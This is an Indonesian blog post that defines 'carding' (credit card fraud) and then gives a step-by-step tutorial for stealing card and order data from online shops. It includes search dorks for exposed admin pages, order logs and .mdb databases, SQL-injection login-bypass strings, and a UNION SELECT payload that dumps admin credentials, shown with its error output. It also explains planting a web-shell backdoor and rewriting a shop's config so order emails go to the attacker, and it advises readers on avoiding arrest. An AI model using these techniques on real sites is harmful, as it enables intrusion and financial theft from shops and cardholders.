APA ITU CARDING DAN BAGAIMANA MELAKUKAN NYA
Selasa, 18 Februari 2014
0
komentar
Pengertian Carding adalah sebuah seni hacking atau juga bisa kita sebut sebuah kejahatan di dunia maya yang berupa penipuan dalam proses belanja dengan menggunakan Nomor kredit dan identitas orang lain. Katu kredit atau credit card tersebut mereka peroleh secara ilegal seperti membobol toko online atau berbasis E-commerce dengan mengambil databasenya yang kemungkinan berisi banyak kartu kredit . Pelaku carding biasanya disebut seorang CARDER.
Ada beberapa cara yang dilakukan seorang carder seperti :
Minimized Physical Contact (tidak adanya kontak secara fisik)
System modus ini adalah carder tidak perlu mencuri kartu kredit secara fisik, tapi cukup dengan mengetahui nomornya, pelaku sudah bisa melakukan aksinya.
Non violance (tanpa kekerasan)
Pelaku tidak melakukan kekerasan secara fisik seperti ancaman yang menimbulkan ketakutan sehinga korban memberikan harta bendanya.
Global
karena kejahatan ini terjadi lintas negara yang mengabaikan batas-batas geografis dan waktu.
High Technology
Sarana yang digunakan dalam kejahatan tersebut menggunakan peralatan berteknologi yang berupa jaringan internet.
Tahun demi tahun, Para carder Indonesia semakin bertambah. Seperti beberapa waktu lalu seorang carder asal Indonesia tertangkap, transaksi dilakukan tersangka di sebuah situs yang menjajakan barang-barang elektronik seperti amplifier. Tersangka selanjutnya menghubungi pemilik barang melalui email untuk membeli barang yang diiklankan di situs tersebut dan dikirim ke Indonesia . Hanya carder bodoh saja yang bisa tertangkap seperti itu. Saran saya jika masih belum mempunyai banyak ilmu tentang carder lebih baik jangan mempraktekan dan langsung kirim ke Indonesia jika kalian ingin aman.
Oke bagaimana cara carding ???,berikut langkah".a
ingat saya hanya membagikan ilmu pengetahuan, semua resiko ada di tangan anda
1. User & Password Admin Default..
Dork :
“/shopadmin.asp”
“/adminshop.asp”
“/shopadm.asp"
“/shoppingadmin.asp"
Contoh :
http://www.site.com/shop/
admin/shopadmin.asp
Masukkan kombinasi kombinasi
password yang saya sebutkan
dibawah ini, klo masuk berarti anda
berhasil.
Kombinasi Password :
admin:’ or a=a–
admin:’ or 1=1–
user:’ or 1=1–
admin:’ or 1=1–.
-------------------------End-----------------------
2. Shopping Order Log.
Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb.
Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya.
Biasanya ini di server
berbasis .cgi, .asp, .php, dsb.
Dork :
“order.txt”
“order.log”
“order.asp”
“order.cgi”
inurl:order filetype:txt
inurl:order filetype:log dsb
Misal target :
http://www.site.net/shop/admin/log/order.log
http://www.site.org/shop/order.cgi?dir=./order/order.log
http://www.site.la/shopping/DCShop/orders/orders.txt
Selamat Mencoba...
------------------------End-----------------------
3. Database Information.
Dengan cara ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.
Dork :
“*.mdb”
“order.mdb”
“database.mdb”
Atau menggunakan info DB :
inurl: ESHOP, Lobby.asp, Proddetail.asp
Contoh :
http://www.site.com/shop/shopadmin/database.mdb
http://www.site.org//cgi-bin/eshop/database/order.mdb
http://www.site.com/fpdb/shop.mdb
http://www.site.com/shopping/data/vsproducts.mdb
-------------------------End-----------------------
4. SQL Injection Advanced Shop Vulnreabilty
Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb.
Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.
Dork :
“product_details.php?item_id=”
“products_rss.php”
Contoh :
http://www.targetnya.com/shop/product_details.php?item_id=13
Ganti tulisan itu dengan :
products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
jadi :
http://www.targetnya.com/shop/products_rss.php?category_id=1‘ UNION SELECT concat(login,char
(58),password),0 FROM va_admins — /*
Jika ada tulisan error seperti ini :
[color="Red"]DB ERROR 1064[/color]
[code]We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button.
If the error persists, please contact our web development team.
The details of the error are shown below. Please quote this in any correspondance regarding this problem.
Page URL:
[url]http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION[/url]%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
Referrer URL:
Database error: Invalid SQL: SELECT
i.item_id, i.item_type_id,
i.item_code, i.item_name,
i.friendly_url, i.short_description,
i.small_image, i.small_image_alt,
i.big_image, i.big_image_alt,
i.price, i.is_sales, i.sales_price,
i.is_points_price, i.points_price,
i.buy_link, i.is_sales,
i.full_description,
i.manufacturer_code, i.issue_date,
ic.category_id, c.category_name,
c.short_description AS
category_short_description,
c.full_description AS
category_full_description FROM
((va_items i INNER JOIN
va_items_categories ic ON
i.item_id=ic.item_id AND
ic.category_id IN (1' UNION SELECT
concat(login,char(58),password),0
FROM va_admins — /
*,Admin:cca293929882ad831bf724a2589f1e20))
LEFT JOIN va_categories c ON
c.category_id = ic.category_id )
WHERE i.is_showing = 1 GROUP BY
i.item_id ORDER BY i.item_order,
i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2' at line 1
[/code]
Nah klo udah tinggal decrypt passwordnya .
------------------------End-----------------------
5. Admin Shop Send Mail Order.
Pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.
Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.
Misal target:
http://www.namasitusnya.com/admin/shop/shellbackdoorloe.php
Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu:
config.php, db.php, configuration.php, database.php,
db.asp, dsb.
Trus buka / cat file tersebut sampe ketemu isi confignya
seperti:
var $dbtype = ‘mysql’;
var $host = ‘localhost’;
var $user = ’shop24_admin’;
var $db = ’shopsex_site’;
var $mailer = ‘mail’;
var $ordermailsendto =
‘ben@netboost.com.au‘;
Nah pada bagian ini “var
$ordermailsendto ='ben@netboost.com.au‘;”, di confignya ganti ajah ama email kmu, misal di
ganti ke: “var $ordermailsendto ='carding@gwdapetcarding.com‘;”.
Nah tinggal tunggu dah tu di email
kamu hasil ordernya.
Sekian tutiorial carding dari saya...
TERIMA KASIH ATAS KUNJUNGAN SAUDARA
Judul: APA ITU CARDING DAN BAGAIMANA MELAKUKAN NYA
Ditulis oleh Gih.!
Rating Blog 5 dari 5
Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke http://giehcyberart.blogspot.com/2014/02/apa-itu-carding-dan-bagaimana-melakukan.html. Terima kasih sudah singgah membaca artikel ini.Ditulis oleh Gih.!
Rating Blog 5 dari 5
0 komentar:
Posting Komentar